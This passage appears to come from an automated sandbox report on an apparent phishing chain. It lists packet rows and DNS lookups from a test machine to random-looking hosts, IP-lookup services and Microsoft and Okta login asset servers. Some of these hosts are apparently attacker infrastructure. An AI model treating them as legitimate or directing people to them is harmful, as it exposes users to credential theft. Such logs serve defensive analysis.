                                                              Jul 3, 2024 09:41:20.343079090 CEST4436297840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:20.343369961 CEST62978443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:20.388500929 CEST4436297840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:20.515007019 CEST4436297840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:20.515103102 CEST4436297840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:20.515180111 CEST62978443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:20.515701056 CEST62978443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:20.515724897 CEST4436297840.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.052248001 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.052288055 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.052431107 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.053985119 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.054003000 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.844944000 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.845035076 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.850687981 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.850696087 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.851460934 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.853971004 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.854396105 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.854402065 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:29.854851961 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:29.896506071 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:30.316732883 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:30.317205906 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:30.317217112 CEST4436298040.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:30.317327023 CEST62980443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:32.562871933 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:32.562922001 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:32.567081928 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:32.567081928 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:32.567122936 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:32.858041048 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858093977 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:32.858207941 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858212948 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858263969 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:32.858318090 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858426094 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858436108 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:32.858572960 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:32.858589888 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.227540970 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:33.227863073 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:33.227876902 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:33.228277922 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:33.228730917 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:33.228801966 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:33.278789043 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:33.314121962 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.314455032 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.314575911 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.317498922 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.317563057 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.318090916 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.318244934 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.318252087 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.324559927 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.342858076 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.343055010 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.343069077 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.344054937 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.344116926 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.344418049 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.344474077 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.344523907 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.372546911 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.372561932 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.388161898 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.388169050 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.419409990 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.435046911 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.445619106 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.445694923 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.445806980 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.445897102 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.445920944 CEST4436298335.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.445931911 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.445969105 CEST62983443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.446780920 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.446805954 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.446861029 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.447109938 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.447128057 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.478012085 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.478085995 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.478147030 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.478368998 CEST62982443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.478385925 CEST4436298235.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.478939056 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.478960991 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.479059935 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.479300976 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.479311943 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.901490927 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.901818037 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.901844978 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.902178049 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.902760029 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.902760029 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.902776957 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.902822971 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.937983036 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.938419104 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.938431978 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.938755989 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.941174984 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.941245079 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.941445112 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.941590071 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:33.941596031 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:33.950695038 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:34.032836914 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:34.032907963 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:34.033067942 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:34.033297062 CEST62984443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:34.033320904 CEST4436298435.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:34.066725016 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:34.066792011 CEST4436298535.190.80.1192.168.2.6
                                                              Jul 3, 2024 09:41:34.067009926 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:34.067009926 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:34.067130089 CEST62985443192.168.2.635.190.80.1
                                                              Jul 3, 2024 09:41:43.122508049 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:43.122575045 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:43.122633934 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:44.266654015 CEST62981443192.168.2.6172.217.18.4
                                                              Jul 3, 2024 09:41:44.266676903 CEST44362981172.217.18.4192.168.2.6
                                                              Jul 3, 2024 09:41:52.340266943 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:52.340311050 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:52.340431929 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:52.341101885 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:52.341118097 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:52.556796074 CEST6100553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:52.561705112 CEST53610051.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:52.561772108 CEST6100553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:52.561920881 CEST6100553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:52.566751003 CEST53610051.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:53.025870085 CEST53610051.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:53.026138067 CEST6100553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:53.031367064 CEST53610051.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:53.031585932 CEST6100553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:53.135057926 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.135288954 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.139054060 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.139087915 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.139322996 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.141201019 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.141268969 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.141277075 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.141485929 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.188508987 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.315829039 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.315906048 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.316287041 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.316287041 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:53.316335917 CEST4436298740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:53.316349030 CEST62987443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:56.144985914 CEST61007443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:56.145055056 CEST4436100740.113.103.199192.168.2.6
                                                              Jul 3, 2024 09:41:56.145152092 CEST61007443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:56.145791054 CEST61007443192.168.2.640.113.103.199
                                                              Jul 3, 2024 09:41:56.145823956 CEST4436100740.113.103.199192.168.2.6
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jul 3, 2024 09:40:27.935682058 CEST53495751.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:27.935960054 CEST53540591.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:27.957304955 CEST53536911.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:29.189605951 CEST53636951.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:29.845374107 CEST5849953192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:29.845561981 CEST6207153192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:30.173084021 CEST53620711.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:30.276032925 CEST53584991.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:31.067904949 CEST5478353192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:31.068591118 CEST6167253192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:31.083395004 CEST53547831.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:31.105873108 CEST53616721.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.513986111 CEST5620653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.516879082 CEST5502953192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.521222115 CEST53562061.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.524719000 CEST53550291.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.525676012 CEST5956953192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.525979996 CEST5772853192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.538168907 CEST53577281.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.577826023 CEST53595691.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.641093969 CEST5576453192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.644396067 CEST6146153192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:32.647985935 CEST53557641.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:32.651984930 CEST53614611.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.422976971 CEST5878653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.423563957 CEST5501653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.424324989 CEST6448253192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.424988031 CEST5953353192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.425817013 CEST6348453192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.426264048 CEST5264453192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.428853035 CEST5129753192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.429006100 CEST6517853192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:33.429867983 CEST53587861.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.430655956 CEST53550161.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.431093931 CEST53644821.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.431674004 CEST53595331.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.432923079 CEST53634841.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.432943106 CEST53526441.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.440167904 CEST53651781.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:33.482614994 CEST53512971.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:35.543534994 CEST5554853192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:35.544054985 CEST6338853192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:35.550637960 CEST53555481.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:35.551096916 CEST53633881.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:37.108814001 CEST5309653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:37.109036922 CEST5446453192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:37.115586996 CEST53530961.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:37.116875887 CEST53544641.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:46.318600893 CEST53575511.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:40:57.211220026 CEST5361406162.159.36.2192.168.2.6
                                                              Jul 3, 2024 09:40:57.769283056 CEST6195253192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:40:57.781459093 CEST53619521.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:00.525572062 CEST6531653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:00.534182072 CEST53653161.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:01.240600109 CEST6419553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:01.267283916 CEST53641951.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:04.872868061 CEST5753753192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:04.873575926 CEST5886353192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:04.874031067 CEST6096953192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:04.877537012 CEST6439553192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:04.879096031 CEST6477753192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:04.881949902 CEST53575371.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:04.881962061 CEST53588631.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:04.881970882 CEST53609691.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:04.886940956 CEST53647771.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:04.899657011 CEST53643951.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:05.814009905 CEST5492953192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:05.821000099 CEST53549291.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:08.677069902 CEST5045853192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:08.685153961 CEST53504581.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:09.489459038 CEST5121153192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:09.497319937 CEST53512111.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:10.304713964 CEST5531253192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:10.342035055 CEST53553121.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:11.953528881 CEST5477753192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:32.639755964 CEST5623653192.168.2.61.1.1.1
                                                              Jul 3, 2024 09:41:32.857125044 CEST53562361.1.1.1192.168.2.6
                                                              Jul 3, 2024 09:41:52.556298971 CEST53536481.1.1.1192.168.2.6
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jul 3, 2024 09:40:29.845374107 CEST192.168.2.61.1.1.10xb79bStandard query (0)www.itanhangasaude.com.brA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:29.845561981 CEST192.168.2.61.1.1.10x5683Standard query (0)www.itanhangasaude.com.br65IN (0x0001)false
                                                              Jul 3, 2024 09:40:31.067904949 CEST192.168.2.61.1.1.10xdd03Standard query (0)vkwek.ckyucle.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:31.068591118 CEST192.168.2.61.1.1.10xb19Standard query (0)vkwek.ckyucle.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.513986111 CEST192.168.2.61.1.1.10x75c3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.516879082 CEST192.168.2.61.1.1.10xea76Standard query (0)www.google.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.525676012 CEST192.168.2.61.1.1.10x5181Standard query (0)nzd92.6gniu68.ruA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.525979996 CEST192.168.2.61.1.1.10x7884Standard query (0)nzd92.6gniu68.ru65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.641093969 CEST192.168.2.61.1.1.10x3f1cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.644396067 CEST192.168.2.61.1.1.10x9f28Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.422976971 CEST192.168.2.61.1.1.10x6dd7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.423563957 CEST192.168.2.61.1.1.10xe7eeStandard query (0)code.jquery.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.424324989 CEST192.168.2.61.1.1.10x14daStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.424988031 CEST192.168.2.61.1.1.10x2e07Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.425817013 CEST192.168.2.61.1.1.10xf4feStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.426264048 CEST192.168.2.61.1.1.10xfde4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.428853035 CEST192.168.2.61.1.1.10xc185Standard query (0)nzd92.6gniu68.ruA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.429006100 CEST192.168.2.61.1.1.10x6960Standard query (0)nzd92.6gniu68.ru65IN (0x0001)false
                                                              Jul 3, 2024 09:40:35.543534994 CEST192.168.2.61.1.1.10xe072Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:35.544054985 CEST192.168.2.61.1.1.10x693cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:37.108814001 CEST192.168.2.61.1.1.10x88eaStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:37.109036922 CEST192.168.2.61.1.1.10xbdeaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:57.769283056 CEST192.168.2.61.1.1.10xbe28Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                              Jul 3, 2024 09:41:00.525572062 CEST192.168.2.61.1.1.10x9212Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:01.240600109 CEST192.168.2.61.1.1.10x497cStandard query (0)vkwek.ckyucle.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.872868061 CEST192.168.2.61.1.1.10x4ef8Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.873575926 CEST192.168.2.61.1.1.10x5140Standard query (0)github.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.874031067 CEST192.168.2.61.1.1.10x6200Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.877537012 CEST192.168.2.61.1.1.10x6cfStandard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:04.879096031 CEST192.168.2.61.1.1.10xc939Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:05.814009905 CEST192.168.2.61.1.1.10xa281Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:08.677069902 CEST192.168.2.61.1.1.10xf8cfStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:09.489459038 CEST192.168.2.61.1.1.10xc7a2Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:10.304713964 CEST192.168.2.61.1.1.10x1151Standard query (0)s3irk.ativens.comA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:11.953528881 CEST192.168.2.61.1.1.10xeeb7Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:41:32.639755964 CEST192.168.2.61.1.1.10xdc7eStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jul 3, 2024 09:40:30.173084021 CEST1.1.1.1192.168.2.60x5683No error (0)www.itanhangasaude.com.britanhangasaude.com.brCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:40:30.276032925 CEST1.1.1.1192.168.2.60xb79bNo error (0)www.itanhangasaude.com.britanhangasaude.com.brCNAME (Canonical name)IN (0x0001)false
                                                              Jul 3, 2024 09:40:30.276032925 CEST1.1.1.1192.168.2.60xb79bNo error (0)itanhangasaude.com.br162.241.62.33A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:31.083395004 CEST1.1.1.1192.168.2.60xdd03No error (0)vkwek.ckyucle.com188.114.96.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:31.083395004 CEST1.1.1.1192.168.2.60xdd03No error (0)vkwek.ckyucle.com188.114.97.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:31.105873108 CEST1.1.1.1192.168.2.60xb19No error (0)vkwek.ckyucle.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.521222115 CEST1.1.1.1192.168.2.60x75c3No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.524719000 CEST1.1.1.1192.168.2.60xea76No error (0)www.google.com65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.538168907 CEST1.1.1.1192.168.2.60x7884No error (0)nzd92.6gniu68.ru65IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.577826023 CEST1.1.1.1192.168.2.60x5181No error (0)nzd92.6gniu68.ru188.114.96.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.577826023 CEST1.1.1.1192.168.2.60x5181No error (0)nzd92.6gniu68.ru188.114.97.3A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:32.647985935 CEST1.1.1.1192.168.2.60x3f1cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.429867983 CEST1.1.1.1192.168.2.60x6dd7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.429867983 CEST1.1.1.1192.168.2.60x6dd7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.429867983 CEST1.1.1.1192.168.2.60x6dd7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.429867983 CEST1.1.1.1192.168.2.60x6dd7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.431093931 CEST1.1.1.1192.168.2.60x14daNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 09:40:33.431093931 CEST1.1.1.1192.168.2.60x14daNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
